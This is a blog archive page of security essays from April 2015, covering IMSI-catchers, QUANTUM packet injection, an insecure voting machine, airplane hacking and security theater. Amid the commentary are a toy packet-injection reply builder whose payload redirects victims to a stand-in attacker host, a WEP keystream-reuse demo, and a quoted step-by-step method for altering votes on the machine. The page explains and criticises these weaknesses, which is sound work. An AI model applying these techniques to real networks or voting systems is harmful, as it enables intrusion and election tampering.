Blog: April 2015 Archives

Measuring the Expertise of Burglars

New research paper: “New methods for examining expertise in burglars in natural and simulated environments: preliminary findings”:

Expertise literature in mainstream cognitive psychology is rarely applied to criminal behaviour. Yet, if closely scrutinised, examples of the characteristics of expertise can be identified in many studies examining the cognitive processes of offenders, especially regarding residential burglary. We evaluated two new methodologies that might improve our understanding of cognitive processing in offenders through empirically observing offending behaviour and decision-making in a free-responding environment. We tested hypotheses regarding expertise in burglars in a small, exploratory study observing the behaviour of ‘expert’ offenders (ex-burglars) and novices (students) in a real and in a simulated environment. Both samples undertook a mock burglary in a real house and in a simulated house on a computer. Both environments elicited notably different behaviours between the experts and the novices with experts demonstrating superior skill. This was seen in: more time spent in high value areas; fewer and more valuable items stolen; and more systematic routes taken around the environments. The findings are encouraging and provide support for the development of these observational methods to examine offender cognitive processing and behaviour.

The lead researcher calls this “dysfunctional expertise,” but I disagree. It’s expertise.

Claire Nee, a researcher at the University of Portsmouth in the U.K., has been studying burglary and other crime for over 20 years. Nee says that the low clearance rate means that burglars often remain active, and some will even gain expertise in the crime. As with any job, practice results in skills. “By interviewing burglars over a number of years we’ve discovered that their thought processes become like experts in any field, that is they learn to automatically pick up cues in the environment that signify a successful burglary without even being aware of it. We call it ‘dysfunctional expertise,'” explains Nee.

See also this paper.

Posted on April 30, 2015 at 2:22 PM

Protecting Against Google Phishing in Chrome

Google has a new Chrome extension called “Password Alert”:

To help keep your account safe, today we’re launching Password Alert, a free, open-source Chrome extension that protects your Google and Google Apps for Work Accounts. Once you’ve installed it, Password Alert will show you a warning if you type your Google password into a site that isn’t a Google sign-in page. This protects you from phishing attacks and also encourages you to use different passwords for different sites, a security best practice.

Here’s how it works for consumer accounts. Once you’ve installed and initialized Password Alert, Chrome will remember a “scrambled” version of your Google Account password. It only remembers this information for security purposes and doesn’t share it with anyone. If you type your password into a site that isn’t a Google sign-in page, Password Alert will show you a notice like the one below. This alert will tell you that you’re at risk of being phished so you can update your password and protect yourself.

It’s a clever idea. Of course it’s not perfect, and doesn’t completely solve the problem. But it’s an easy security improvement, and one that should be generalized to non-Google sites. (Although it’s not uncommon for the security of many passwords to be tied to the security of the e-mail account.) It reminds me somewhat of cert pinning; in both cases, the browser uses independent information to verify what the network is telling it.
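The check Google describes (remember only a “scrambled” version of the password, then compare as you type) can be sketched in a few lines. This is a toy illustration of the general idea, not Google’s actual implementation; the class name and parameters are invented for the example:

```python
import hashlib
import os
from collections import deque

class PasswordAlertSketch:
    """Toy model of a Password Alert-style check: keep only a salted,
    slow hash of the password, plus a rolling window of recent
    keystrokes to compare against it."""

    def __init__(self, password: str):
        self.salt = os.urandom(16)
        self.length = len(password)
        self.digest = self._scramble(password)
        self.recent = deque(maxlen=self.length)

    def _scramble(self, text: str) -> bytes:
        # A slow KDF so the stored value resists offline brute force.
        return hashlib.pbkdf2_hmac("sha256", text.encode(), self.salt, 100_000)

    def on_keystroke(self, char: str, on_google_page: bool) -> bool:
        """True if the full password was just typed somewhere other than
        a Google sign-in page, i.e. a phishing warning should fire."""
        self.recent.append(char)
        if on_google_page or len(self.recent) < self.length:
            return False
        return self._scramble("".join(self.recent)) == self.digest

alert = PasswordAlertSketch("correct horse")
results = [alert.on_keystroke(c, on_google_page=False) for c in "correct horse"]
print(results[-1])  # True: the password appeared on a non-Google page
```

Note that the extension never stores the password itself, only the salted hash, which is what makes the scheme reasonable to ship in a browser.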

Slashdot thread.

EDITED TO ADD: It’s not even a day old, and there’s an attack.

Posted on April 30, 2015 at 9:11 AM

Nice Essay on Security Snake Oil

This is good:

Just as “data” is being sold as “intelligence”, a lot of security technologies are being sold as “security solutions” rather than what they for the most part are, namely very narrow focused appliances that as a best case can be part of your broader security effort.

Too many of these appliances do unfortunately not easily integrate with other appliances or with the rest of your security portfolio, or with your policies and procedures. Instead, they are created to work and be operated as completely stand-alone devices. This really is not what we need. To quote Alex Stamos, we need platforms. Reusable platforms that easily integrate with whatever else we decide to put into our security effort.

Slashdot thread.

Posted on April 28, 2015 at 6:21 AM

The Further Democratization of Stingray

Stingray is the code name for an IMSI-catcher, which is basically a fake cell phone tower sold by Harris Corporation to various law enforcement agencies. (It’s actually just one of a series of devices with fish names—Amberjack is another—but it’s the name used in the media.) What it basically does is trick nearby cell phones into connecting to it. Once that happens, the IMSI-catcher can collect identification and location information of the phones and, in some cases, eavesdrop on phone conversations, text messages, and web browsing. (IMSI stands for International Mobile Subscriber Identity, which is the unique serial number your cell phone broadcasts so that the cellular system knows where you are.)
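The trick works because 2G GSM has no tower authentication: a handset simply camps on the strongest cell claiming to be its operator, so a catcher only needs to transmit louder than the real towers. A toy simulation of that selection logic (the dataclass, operator name, and signal numbers are all invented for illustration):

```python
from dataclasses import dataclass

@dataclass
class CellTower:
    operator: str
    signal_dbm: int      # higher (closer to 0) means stronger
    legitimate: bool

def camp_on(towers: list[CellTower], operator: str) -> CellTower:
    # In 2G the phone has no way to verify the tower, so the choice
    # comes down to matching operator and raw signal strength.
    candidates = [t for t in towers if t.operator == operator]
    return max(candidates, key=lambda t: t.signal_dbm)

nearby = [
    CellTower("ExampleTel", -95, legitimate=True),
    CellTower("ExampleTel", -88, legitimate=True),
    CellTower("ExampleTel", -50, legitimate=False),  # the IMSI-catcher
]
chosen = camp_on(nearby, "ExampleTel")
print(chosen.legitimate)  # False: the phone registers with the fake tower
```

Once the phone registers, the fake tower can ask for its IMSI as part of the normal protocol, which is all the identification and location tracking requires.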

The use of IMSI-catchers in the US used to be a massive police secret. The FBI is so scared of explaining this capability in public that the agency makes local police sign nondisclosure agreements before using the technique, and has instructed them to lie about their use of it in court. When it seemed possible that local police in Sarasota, Florida, might release documents about Stingray cell phone interception equipment to plaintiffs in civil rights litigation against them, federal marshals seized the documents. More recently, St. Louis police dropped a case rather than talk about the technology in court. And Baltimore police admitted using Stingray over 25,000 times.

The truth is that it’s no longer a massive police secret. We now know a lot about IMSI-catchers. And the US government does not have a monopoly over the use of IMSI-catchers. I wrote in Data and Goliath:

There are dozens of these devices scattered around Washington, DC, and the rest of the country run by who-knows-what government or organization. Criminal uses are next.

From the Washington Post:

How rife? Turner and his colleagues assert that their specially outfitted smartphone, called the GSMK CryptoPhone, had detected signs of as many as 18 IMSI catchers in less than two days of driving through the region. A map of these locations, released Wednesday afternoon, looks like a primer on the geography of Washington power, with the surveillance devices reportedly near the White House, the Capitol, foreign embassies and the cluster of federal contractors near Dulles International Airport.

At the RSA Conference last week, Pwnie Express demonstrated their IMSI-catcher detector.

Building your own IMSI-catcher isn’t hard or expensive. At Def Con in 2010, researcher Chris Paget (now Kristin Paget) demonstrated a homemade IMSI-catcher. The whole thing cost $1,500, which is cheap enough for both criminals and nosy hobbyists.

It’s even cheaper and easier now. Anyone with a HackRF software-defined radio card can turn their laptop into an amateur IMSI-catcher. And this is why companies are building detectors into their security monitoring equipment.

Two points here. The first is that the FBI should stop treating Stingray like it’s a big secret, so we can start talking about policy.

The second is that we should stop pretending that this capability is exclusive to law enforcement, and recognize that we’re all at risk because of it. If we continue to allow our cellular networks to be vulnerable to IMSI-catchers, then we are all vulnerable to any foreign government, criminal, hacker, or hobbyist that builds one. If we instead engineer our cellular networks to be secure against this sort of attack, then we are safe against all those attackers.

Me:

We have one infrastructure. We can’t choose a world where the US gets to spy and the Chinese don’t. We get to choose a world where everyone can spy, or a world where no one can spy. We can be secure from everyone, or vulnerable to anyone.

Like QUANTUM, we have the choice of building our cellular infrastructure for security or for surveillance. Let’s choose security.

EDITED TO ADD (5/2): Here’s an IMSI catcher for sale on alibaba.com. At this point, every dictator in the world is using this technology against their own citizens. They’re used extensively in China to send SMS spam without paying the telcos any fees. On a Food Network show called Mystery Diners—episode 108, “Cabin Fever”—someone used an IMSI catcher to intercept a phone call between two restaurant employees.

The new model of the IMSI catcher from Harris Corporation is called Hailstorm. It has the ability to remotely inject malware into cell phones. Other Harris IMSI-catcher codenames are Kingfish, Gossamer, Triggerfish, Amberjack and Harpoon. The competitor is DRT, made by the Boeing subsidiary Digital Receiver Technology, Inc.

EDITED TO ADD (5/2): Here’s an IMSI catcher called Piranha, sold by the Israeli company Rayzone Corp. It claims to work on GSM 2G, 3G, and 4G networks (plus CDMA, of course). The basic Stingray only works on GSM 2G networks, and intercepts phones on the more modern networks by forcing them to downgrade to the 2G protocols. We believe that the more modern IMSI catchers also work against 3G and 4G networks.

EDITED TO ADD (5/13): The FBI recently released more than 5,000 pages of documents about Stingray, but nearly everything is redacted.

Posted on April 27, 2015 at 6:27 AM

Federal Trade Commissioner Julie Brill on Obscurity

I think this is good:

Obscurity means that personal information isn’t readily available to just anyone. It doesn’t mean that information is wiped out or even locked up; rather, it means that some combination of factors makes certain types of information relatively hard to find.

Obscurity has always been an important component of privacy. It is a helpful concept because it encapsulates how a broad range of social, economic, and technological changes affects norms and consumer expectations.

Posted on April 24, 2015 at 12:42 PM

The Further Democratization of QUANTUM

From my book Data and Goliath:

…when I was working with the Guardian on the Snowden documents, the one top-secret program the NSA desperately did not want us to expose was QUANTUM. This is the NSA’s program for what is called packet injection—basically, a technology that allows the agency to hack into computers. Turns out, though, that the NSA was not alone in its use of this technology. The Chinese government uses packet injection to attack computers. The cyberweapons manufacturer Hacking Team sells packet injection technology to any government willing to pay for it. Criminals use it. And there are hacker tools that give the capability to individuals as well. All of these existed before I wrote about QUANTUM. By using its knowledge to attack others rather than to build up the Internet’s defenses, the NSA has worked to ensure that anyone can use packet injection to hack into computers.

And that’s true. China’s Great Cannon uses QUANTUM. The ability to inject packets into the backbone is a powerful attack technology, and one that is increasingly being used by different attackers.

I continued:

Even when technologies are developed inside the NSA, they don’t remain exclusive for long. Today’s top-secret programs become tomorrow’s PhD theses and the next day’s hacker tools.

I could have continued with “and the next day’s homework assignment,” because Michalis Polychronakis at Stony Brook University has just assigned building a rudimentary QUANTUM tool as a homework assignment. It’s basically sniff, regexp match, swap sip/sport/dip/dport/syn/ack, set ack and push flags, and add the payload to create the malicious reply. Shouldn’t take more than a few hours to get it working. Of course, it would take a lot more to make it as sophisticated and robust as what the NSA and China have at their disposal, but the moral is that the tool is now in the hands of anyone who wants it. We need to make the Internet secure against this kind of attack instead of pretending that only the “good guys” can use it effectively.
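That recipe translates almost line for line into code. Here is a rough sketch using plain dictionaries in place of parsed packets (a real tool would sniff live traffic with libpcap or similar; the addresses, trigger pattern, and payload here are invented for illustration):

```python
import re
from typing import Optional

PATTERN = re.compile(rb"GET /")   # hypothetical trigger regexp
PAYLOAD = b"HTTP/1.1 302 Found\r\nLocation: http://attacker.example/\r\n\r\n"

def quantum_reply(pkt: dict) -> Optional[dict]:
    """Build the spoofed reply for a sniffed TCP segment: swap sip/dip
    and sport/dport, continue the sequence numbers, set the PSH and ACK
    flags, and attach the malicious payload."""
    if not PATTERN.search(pkt["payload"]):
        return None
    return {
        "sip": pkt["dip"], "dip": pkt["sip"],          # swap addresses
        "sport": pkt["dport"], "dport": pkt["sport"],  # swap ports
        "seq": pkt["ack"],                             # our seq is their ack
        "ack": pkt["seq"] + len(pkt["payload"]),       # ack what they sent
        "flags": {"PSH", "ACK"},
        "payload": PAYLOAD,
    }

sniffed = {"sip": "10.0.0.2", "dip": "93.184.216.34",
           "sport": 51234, "dport": 80, "seq": 1000, "ack": 5000,
           "payload": b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"}
reply = quantum_reply(sniffed)
print(reply["dip"], reply["dport"], reply["seq"])  # 10.0.0.2 51234 5000
```

The forged reply only wins if it reaches the victim before the legitimate server’s answer, which is why a position on the backbone makes QUANTUM so effective.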

End-to-end encryption is the solution. Nicholas Weaver wrote:

The only self defense from all of the above is universal encryption. Universal encryption is difficult and expensive, but unfortunately necessary.

Encryption doesn’t just keep our traffic safe from eavesdroppers, it protects us from attack. DNSSEC validation protects DNS from tampering, while SSL armors both email and web traffic.

There are many engineering and logistic difficulties involved in encrypting all traffic on the internet, but it’s one we must overcome if we are to defend ourselves from the entities that have weaponized the backbone.

Yes.

And this is true in general. We have one network in the world today. Either we build our communications infrastructure for surveillance, or we build it for security. Either everyone gets to spy, or no one gets to spy. That’s our choice, with the Internet, with cell phone networks, with everything.

Posted on April 24, 2015 at 8:55 AM

An Incredibly Insecure Voting Machine

Wow:

The weak passwords—which are hard-coded and can’t be changed—were only one item on a long list of critical defects uncovered by the review. The Wi-Fi network the machines use is encrypted with wired equivalent privacy, an algorithm so weak that it takes as little as 10 minutes for attackers to break a network’s encryption key. The shortcomings of WEP have been so well-known that it was banished in 2004 by the IEEE, the world’s largest association of technical professionals. What’s more, the WINVote runs a version of Windows XP Embedded that hasn’t received a security patch since 2004, making it vulnerable to scores of known exploits that completely hijack the underlying machine. Making matters worse, the machine uses no firewall and exposes several important Internet ports.

It’s the AVS WinVote touchscreen Direct Recording Electronic (DRE). The Virginia Information Technology Agency (VITA) investigated the machine, and found that you could hack this machine from across the street with a smart phone:

So how would someone use these vulnerabilities to change an election?

  1. Take your laptop to a polling place, and sit outside in the parking lot.
  2. Use a free sniffer to capture the traffic, and use that to figure out the WEP password (which VITA did for us).
  3. Connect to the voting machine over WiFi.
  4. If asked for a password, the administrator password is “admin” (VITA provided that).
  5. Download the Microsoft Access database using Windows Explorer.
  6. Use a free tool to extract the hardwired key (“shoup”), which VITA also did for us.
  7. Use Microsoft Access to add, delete, or change any of the votes in the database.
  8. Upload the modified copy of the Microsoft Access database back to the voting machine.
  9. Wait for the election results to be published.

Note that none of the above steps, with the possible exception of figuring out the WEP password, require any technical expertise. In fact, they’re pretty much things that the average office worker does on a daily basis.
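The WEP weakness behind step 2 is worth spelling out: WEP prepends a 24-bit initialization vector to the RC4 key, IVs repeat quickly on a busy network, and two messages encrypted under the same keystream cancel out under XOR. A toy demonstration (the key and plaintexts are invented; real attacks like aircrack-ng recover the key itself from captured IVs):

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling, then XOR with the keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = [], 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

iv = b"\x01\x02\x03"          # WEP's 24-bit IV, which repeats quickly
secret = b"wepkey"            # hypothetical shared key
p1 = b"candidate=alice"
p2 = b"candidate=bobby"
c1 = rc4(iv + secret, p1)     # same IV + key means the same keystream
c2 = rc4(iv + secret, p2)
# Keystream reuse: c1 XOR c2 == p1 XOR p2, so one known plaintext
# decrypts the other without ever recovering the key.
recovered = bytes(a ^ b ^ c for a, b, c in zip(c1, c2, p1))
print(recovered)  # b'candidate=bobby'
```

This kind of keystream reuse is one of several independent breaks in WEP, which is why the IEEE deprecated it back in 2004.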

More.

Posted on April 23, 2015 at 7:19 AM

"Hinky" in Action

In Beyond Fear I wrote about trained officials recognizing “hinky” and how it differs from profiling:

Ressam had to clear customs before boarding the ferry. He had fake ID, in the name of Benni Antoine Noris, and the computer cleared him based on this ID. He was allowed to go through after a routine check of his car’s trunk, even though he was wanted by the Canadian police. On the other side of the Strait of Juan de Fuca, at Port Angeles, Washington, Ressam was approached by U.S. customs agent Diana Dean, who asked some routine questions and then decided that he looked suspicious. He was fidgeting, sweaty, and jittery. He avoided eye contact. In Dean’s own words, he was acting “hinky.” More questioning—there was no one else crossing the border, so two other agents got involved—and more hinky behavior. Ressam’s car was eventually searched, and he was finally discovered and captured. It wasn’t any one thing that tipped Dean off; it was everything encompassed in the slang term “hinky.” But the system worked. The reason there wasn’t a bombing at LAX around Christmas in 1999 was because a knowledgeable person was in charge of security and paying attention.

I wrote about this again in 2007:

The key difference is expertise. People trained to be alert for something hinky will do much better than any profiler, but people who have no idea what to look for will do no better than random.

Here’s another story from last year:

On April 28, 2014, Yusuf showed up alone at the Minneapolis Passport Agency and applied for an expedited passport. He wanted to go “sightseeing” in Istanbul, where he was planning to meet someone he recently connected with on Facebook, he allegedly told the passport specialist.

“It’s a guy, just a friend,” he told the specialist, according to court documents.

But when the specialist pressed him for more information about his “friend” in Istanbul and his plans while there, Yusuf couldn’t offer any details, the documents allege.

“[He] became visibly nervous, more soft-spoken, and began to avoid eye contact,” the documents say. “Yusuf did not appear excited or happy to be traveling to Turkey for vacation.”

In fact, the passport specialist “found his interaction with Yusuf so unusual that he contacted his supervisor who, in turn, alerted the FBI to Yusuf’s travel,” according to the court documents.

This is what works. Not profiling. Not bulk surveillance. Not defending against any particular tactics or targets. In the end, this is what keeps us safe.

Posted on April 22, 2015 at 8:40 AM

Hacking Airplanes

Imagine this: A terrorist hacks into a commercial airplane from the ground, takes over the controls from the pilots and flies the plane into the ground. It sounds like the plot of some “Die Hard” reboot, but it’s actually one of the possible scenarios outlined in a new Government Accountability Office report on security vulnerabilities in modern airplanes.

It’s certainly possible, but in the scheme of Internet risks I worry about, it’s not very high. I’m more worried about the more pedestrian attacks against more common Internet-connected devices. I’m more worried, for example, about a multination cyber arms race that stockpiles capabilities such as this, and prioritizes attack over defense in an effort to gain relative advantage. I worry about the democratization of cyberattack techniques, and who might have the capabilities currently reserved for nation-states. And I worry about a future a decade from now if these problems aren’t addressed.

First, the airplanes. The problem the GAO identifies is one computer security experts have talked about for years. Newer planes such as the Boeing 787 Dreamliner and the Airbus A350 and A380 have a single network that is used both by pilots to fly the plane and passengers for their Wi-Fi connections. The risk is that a hacker sitting in the back of the plane, or even one on the ground, could use the Wi-Fi connection to hack into the avionics and then remotely fly the plane.

The report doesn’t explain how someone could do this, and there are currently no known vulnerabilities that a hacker could exploit. But all systems are vulnerable—we simply don’t have the engineering expertise to design and build perfectly secure computers and networks—so of course we believe this kind of attack is theoretically possible.

Previous planes had separate networks, a much more secure design.

As terrifying as this movie-plot threat is—and it has been the plot of several recent works of fiction—this is just one example of an increasingly critical problem: As the computers already critical to running our infrastructure become connected, our vulnerability to cyberattack grows. We’ve already seen vulnerabilities in baby monitors, cars, medical equipment and all sorts of other Internet-connected devices. In February, Toyota recalled 1.9 million Prius cars because of a software vulnerability. Expect similar vulnerabilities in our smart thermostats, smart light bulbs and everything else connected to the smart power grid. The Internet of Things will bring computers into every aspect of our life and society. Those computers will be on the network and will be vulnerable to attack.

And because they’ll all be networked together, a vulnerability in one device will affect the security of everything else. Right now, a vulnerability in your home router can compromise the security of your entire home network. A vulnerability in your Internet-enabled refrigerator can reportedly be used as a launching pad for further attacks.

Future attacks will be exactly like what’s happening on the Internet today with your computer and smartphones, only they will be with everything. It’s all one network, and it’s all critical infrastructure.

Some of these attacks will require sufficient budget and organization to limit them to nation-state aggressors. But that’s hardly comforting. North Korea is believed to have launched a massive cyberattack against Sony Pictures last year. Last month, China used a cyberweapon called the “Great Cannon” against the website GitHub. In 2010, the U.S. and Israeli governments launched a sophisticated cyberweapon called Stuxnet against the Iranian Natanz nuclear enrichment facility; it used a series of vulnerabilities to cripple centrifuges critical for separating nuclear material. In fact, the United States has done more to weaponize the Internet than any other country.

Governments only have a fleeting advantage over everyone else, though. Today’s top-secret National Security Agency programs become tomorrow’s Ph.D. theses and the next day’s hacker tools. So while remotely hacking the 787 Dreamliner’s avionics might be well beyond the capabilities of anyone except Boeing engineers today, that’s not going to be true forever.

What this all means is that we have to start thinking about the security of the Internet of Things—whether the issue in question is today’s airplanes or tomorrow’s smart clothing. We can’t repeat the mistakes of the early days of the PC and then the Internet, where we initially ignored security and then spent years playing catch-up. We have to build security into everything that is going to be connected to the Internet.

This is going to require both significant research and major commitments by companies. It’s also going to require legislation mandating certain levels of security on devices connecting to the Internet, and at network providers that make the Internet work. This isn’t something the market can solve on its own, because there are just too many incentives to ignore security and hope that someone else will solve it.

As a nation, we need to prioritize defense over offense. Right now, the NSA and U.S. Cyber Command have a strong interest in keeping the Internet insecure so they can better eavesdrop on and attack our enemies. But this prioritization cuts both ways: We can’t leave others’ networks vulnerable without also leaving our own vulnerable. And as one of the most networked countries on the planet, we are highly vulnerable to attack. It would be better to focus the NSA’s mission on defense and harden our infrastructure against attack.

Remember the GAO’s nightmare scenario: A hacker on the ground exploits a vulnerability in the airplane’s Wi-Fi system to gain access to the airplane’s network. Then he exploits a vulnerability in the firewall that separates the passengers’ network from the avionics to gain access to the flight controls. Then he uses other vulnerabilities both to lock the pilots out of the cockpit controls and take control of the plane himself.

It’s a scenario made possible by insecure computers and insecure networks. And while it might take a government-led secret project on the order of Stuxnet to pull it off today, that won’t always be true.

Of course, this particular movie-plot threat might never become a real one. But it is almost certain that some equally unlikely scenario will. I just hope we have enough security expertise to deal with whatever it ends up being.

This essay originally appeared on CNN.com.

EDITED TO ADD: News articles.

Posted on April 21, 2015 at 1:40 PM

Hacker Detained by FBI after Tweeting about Airplane Software Vulnerabilities

This is troubling:

Chris Roberts was detained by FBI agents on Wednesday as he was deplaning his United flight, which had just flown from Denver to Syracuse, New York. While on board the flight, he tweeted a joke about taking control of the plane’s engine-indicating and crew-alerting system, which provides flight crews with information in real-time about an aircraft’s functions, including temperatures of various equipment, fuel flow and quantity, and oil pressure. In the tweet, Roberts jested: “Find myself on a 737/800, lets see Box-IFE-ICE-SATCOM, ? Shall we start playing with EICAS messages? ‘PASS OXYGEN ON’ Anyone ? :)” FBI agents questioned Roberts for four hours and confiscated his iPad, MacBook Pro, and storage devices.

Yes, the real issue here is the chilling effect on security research. Security researchers who point out security flaws are doing a good thing, and should be encouraged.

But to me, the fascinating part of this story is that a computer was monitoring the Twitter feed and understood the obscure references, alerted a person who figured out who wrote them, researched what flight he was on, and sent an FBI team to the Syracuse airport within a couple of hours. There’s some serious surveillance going on.
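At its simplest, that kind of monitoring is a keyword watch over the public tweet stream. The watchlist below is pure conjecture; the real system’s rules are unknown:

```python
import re

# Hypothetical watchlist of avionics jargon -- invented for this sketch.
AVIONICS_TERMS = re.compile(r"\b(EICAS|ACARS|SATCOM|IFE|avionics)\b",
                            re.IGNORECASE)

def flag_tweet(text: str) -> bool:
    """True if a tweet mentions terms worth escalating to an analyst."""
    return bool(AVIONICS_TERMS.search(text))

tweet = ("Find myself on a 737/800, lets see Box-IFE-ICE-SATCOM, ? "
         "Shall we start playing with EICAS messages? 'PASS OXYGEN ON' "
         "Anyone ? :)")
print(flag_tweet(tweet))  # True
print(flag_tweet("Nice flight, smooth landing in Syracuse."))  # False
```

The trivial filter is the easy part; what the story implies on top of it—identifying the author, finding his flight, and dispatching agents within hours—is where the serious surveillance infrastructure shows.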

Now, it is possible that Roberts was being specifically monitored. He is already known as a security researcher who is working on avionics hacking. But still…

Slashdot thread. Hacker News thread.

EDITED TO ADD (4/22): Another article, this one about the debate over disclosing security vulnerabilities.

Posted on April 21, 2015 at 5:26 AM

Counting the US Intelligence Community Leakers

It’s getting hard to keep track of the US intelligence community leakers without a scorecard. So here’s my attempt:

  • Leaker #1: Chelsea Manning.
  • Leaker #2: Edward Snowden.
  • Leaker #3: The person who leaked secret documents to Jake Appelbaum, Laura Poitras, and others in Germany: the Angela Merkel surveillance story, the TAO catalog, the X-KEYSCORE rules. My guess is that this is either an NSA employee or contractor working in Germany, or someone from German intelligence who has access to NSA documents. Snowden has said that he is not the source for the Merkel story, and Greenwald has confirmed that the Snowden documents are not the source for the X-KEYSCORE rules. This might be the “high-ranking NSA employee in Germany” from this story—or maybe that’s someone else entirely.
  • Leaker #4: “A source in the intelligence community,” according to the Intercept, who leaked information about the Terrorist Screening Database, the “second leaker” from the movie Citizenfour. Greenwald promises a lot from him: “Snowden, at a meeting with Greenwald in Moscow, expresses surprise at the level of information apparently coming from this new source. Greenwald, fearing he will be overheard, writes the details on scraps of paper.” We have seen nothing since, though. This is probably the leaker the FBI identified, although we have heard nothing further about that, either.
  • Leaker #5: Someone who is leaking CIA documents.
  • Leaker #6: The person who leaked secret information about WTO spying to the Intercept and the New Zealand Herald. This isn’t Snowden; the Intercept is very careful to identify him as the source when it writes about the documents he provided. Neither publication gives any indication of how it was obtained. This might be Leaker #3, since it contains X-KEYSCORE rules.
  • Leaker #7: The person who just leaked secret information about the US drone program to the Intercept and Der Spiegel. This also might be Leaker #3, since there is a Germany connection. According to the Intercept: “The slides were provided by a source with knowledge of the U.S. government’s drone program who declined to be identified because of fears of retribution.” That implies someone new.

Am I missing anyone?

Harvard Law School professor Yochai Benkler has written an excellent law review article on the need for a whistleblower defense. And there’s this excellent article by David Pozen on why government leaks are, in general, a good thing. I wrote about the value of whistleblowers in Data and Goliath.

Way back in June 2013, Glenn Greenwald said that “courage is contagious.” He seems to be correct.

This post was originally published on the Lawfare blog.

EDITED TO ADD (4/22): News article.

In retrospect, I shouldn’t have included Manning in this list. I wanted it to be a list of active leaks, not historical leaks. And while Snowden is no longer leaking information, the reporters who received his documents are still releasing bits and pieces.

Posted on April 20, 2015 at 11:18 AM

Metal Detectors at Sports Stadiums

Fans attending Major League Baseball games are being greeted in a new way this year: with metal detectors at the ballparks. Touted as a counterterrorism measure, they’re nothing of the sort. They’re pure security theater: They look good without doing anything to make us safer. We’re stuck with them because of a combination of buck passing, CYA thinking, and fear.

As a security measure, the new devices are laughable. The ballpark metal detectors are much more lax than the ones at an airport checkpoint. They aren’t very sensitive—people with phones and keys in their pockets are sailing through—and there are no X-ray machines. Bags get the same cursory search they’ve gotten for years. And fans wanting to avoid the detectors can opt for a “light pat-down search” instead.

There’s no evidence that this new measure makes anyone safer. A halfway competent ticketholder would have no trouble sneaking a gun into the stadium. For that matter, a bomb exploded at a crowded checkpoint would be no less deadly than one exploded in the stands. These measures will, at best, be effective at stopping the random baseball fan who’s carrying a gun or knife into the stadium. That may be a good idea, but unless there’s been a recent spate of fan shootings and stabbings at baseball games—and there hasn’t—this is a whole lot of time and money being spent to combat an imaginary threat.

But imaginary threats are the only ones baseball executives have to stop this season; there’s been no specific terrorist threat or actual intelligence to be concerned about. MLB executives forced this change on ballparks based on unspecified discussions with the Department of Homeland Security after the Boston Marathon bombing in 2013. Because, you know, that was also a sporting event.

This system of vague consultations and equally vague threats ensures that no one organization can be seen as responsible for the change. MLB can claim that the league and teams “work closely” with DHS. DHS can claim that it was MLB’s initiative. And both can safely relax because if something happens, at least they did something.

It’s an attitude I’ve seen before: “Something must be done. This is something. Therefore, we must do it.” Never mind if the something makes any sense or not.

In reality, this is CYA security, and it’s pervasive in post-9/11 America. It no longer matters if a security measure makes sense, if it’s cost-effective or if it mitigates any actual threats. All that matters is that you took the threat seriously, so if something happens you won’t be blamed for inaction. It’s security, all right—security for the careers of those in charge.

I’m not saying that these officials care only about their jobs and not at all about preventing terrorism, only that their priorities are skewed. They imagine vague threats, and come up with correspondingly vague security measures intended to address them. They experience none of the costs. They’re not the ones who have to deal with the long lines and confusion at the gates. They’re not the ones who have to arrive early to avoid the messes the new policies have caused around the league. And if fans spend more money at the concession stands because they’ve arrived an hour early and have had the food and drinks they tried to bring along confiscated, so much the better, from the team owners’ point of view.

I can hear the objections to this as I write. You don’t know these measures won’t be effective! What if something happens? Don’t we have to do everything possible to protect ourselves against terrorism?

That’s worst-case thinking, and it’s dangerous. It leads to bad decisions, bad design and bad security. A better approach is to realistically assess the threats, judge security measures on their effectiveness and take their costs into account. And the result of that calm, rational look will be the realization that there will always be places where we pack ourselves densely together, and that we should spend less time trying to secure those places and more time finding terrorist plots before they can be carried out.

So far, fans have been exasperated but mostly accepting of these new security measures. And this is precisely the problem—most of us don’t care all that much. Our options are to put up with these measures, or stay home. Going to a baseball game is not a political act, and metal detectors aren’t worth a boycott. But there’s an undercurrent of fear as well. If it’s in the name of security, we’ll accept it. As long as our leaders are scared of the terrorists, they’re going to continue the security theater. And we’re similarly going to accept whatever measures are forced upon us in the name of security. We’re going to accept the National Security Agency’s surveillance of every American, airport security procedures that make no sense and metal detectors at baseball and football stadiums. We’re going to continue to waste money overreacting to irrational fears.

We no longer need the terrorists. We’re now so good at terrorizing ourselves.

This essay previously appeared in the Washington Post.

Posted on April 15, 2015 at 6:58 AM

Two Thoughtful Essays on the Future of Privacy

Paul Krugman argues that we’ll give up our privacy because we want to emulate the rich, who are surrounded by servants who know everything about them:

Consider the Varian rule, which says that you can forecast the future by looking at what the rich have today—that is, that what affluent people will want in the future is, in general, something like what only the truly rich can afford right now. Well, one thing that’s very clear if you spend any time around the rich—and one of the very few things that I, who by and large never worry about money, sometimes envy—is that rich people don’t wait in line. They have minions who ensure that there’s a car waiting at the curb, that the maitre-d escorts them straight to their table, that there’s a staff member to hand them their keys and their bags are already in the room.

And it’s fairly obvious how smart wristbands could replicate some of that for the merely affluent. Your reservation app provides the restaurant with the data it needs to recognize your wristband, and maybe causes your table to flash up on your watch, so you don’t mill around at the entrance, you just walk in and sit down (which already happens in Disney World.) You walk straight into the concert or movie you’ve bought tickets for, no need even to have your phone scanned. And I’m sure there’s much more—all kinds of context-specific services that you won’t even have to ask for, because systems that track you know what you’re up to and what you’re about to need.

Daniel C. Dennett and Deb Roy look at our loss of privacy in evolutionary terms, and see all sorts of adaptations coming:

The tremendous change in our world triggered by this media inundation can be summed up in a word: transparency. We can now see further, faster, and more cheaply and easily than ever before—and we can be seen. And you and I can see that everyone can see what we see, in a recursive hall of mirrors of mutual knowledge that both enables and hobbles. The age-old game of hide-and-seek that has shaped all life on the planet has suddenly shifted its playing field, its equipment and its rules. The players who cannot adjust will not last long.

